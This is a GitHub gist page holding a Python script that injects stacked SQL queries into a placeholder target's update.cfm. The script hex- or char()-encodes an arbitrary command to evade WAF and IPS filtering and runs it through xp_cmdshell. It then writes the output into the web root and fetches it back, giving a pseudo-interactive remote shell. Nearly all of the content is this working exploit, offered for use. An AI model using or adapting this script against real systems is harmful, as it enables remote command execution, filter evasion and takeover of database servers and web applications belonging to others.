Skip to content

Instantly share code, notes, and snippets.

@idkwim
Forked from notdodo/mashell.py
Created October 14, 2020 05:45
Show Gist options
  • Save idkwim/12291e6e4d24f52ac6b0be2daebe9a5e to your computer and use it in GitHub Desktop.
Save idkwim/12291e6e4d24f52ac6b0be2daebe9a5e to your computer and use it in GitHub Desktop.
Execute command using HEX or CHAR encoding. Bypass WAF and IPS filtering enabling RCE using xp_cmdshell: https://knifesec.com/evading-sql-injection-filters-to-get-rce/
#!/usr/bin/env python3
# Injector script to get a pseudo-interactive shell using xp_cmdshell
# Source post:
# Author: notdodo
# https://twitter.com/_d_0_d_o_
#
# USAGE: python3 ./mashell.py "whoami /priv"
#
import binascii
import hashlib
import requests
import sys
BASE_URL = "http://targeturl.tar/"
INJECTION_PATH = BASE_URL + "update.cfm"
OUTPUT_FILE = hashlib.md5("pwned".encode()).hexdigest() + ".txt"
WEB_ROOT = "C:\\webroot\\webapplication\\library\\"
OUTPUT_PATH = BASE_URL + OUTPUT_FILE
# Get the command and out char(100)+char(105)+char(114)
def encode_char(command):
s = ""
for i in command:
s += "char(" + str(ord(i)) + ")+"
return s[:-1]
def encode_hex(command):
return binascii.hexlify(command.encode()).decode()
# Injection command execution using a support table
injection_payload = {
"oid": """1;
drop table temptable;
create table temptable (output ntext null);
declare @t nvarchar(4000) set @t={}
insert into temptable(output) EXEC master..xp_cmdshell @t""",
"retrieval": "Invia",
}
# Return the output from the table (cmd output)
check_payload = {
"Cancel": "Annulla",
"oid": "(select convert(int, cast((SELECT TOP 1 output FROM temptable) as ntext)) from syscolumns)",
}
# Read the command
command = " ".join(sys.argv[1:])
# Append the out redirection
command += " > " + WEB_ROOT + OUTPUT_FILE
# Update the payload
injection_payload["oid"] = injection_payload["oid"].format(encode_hex(command))
# EXECUTE
r = requests.post(INJECTION_PATH, data=injection_payload, timeout=30)
r = requests.get(OUTPUT_PATH, data=check_payload, timeout=5)
print(r.text)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment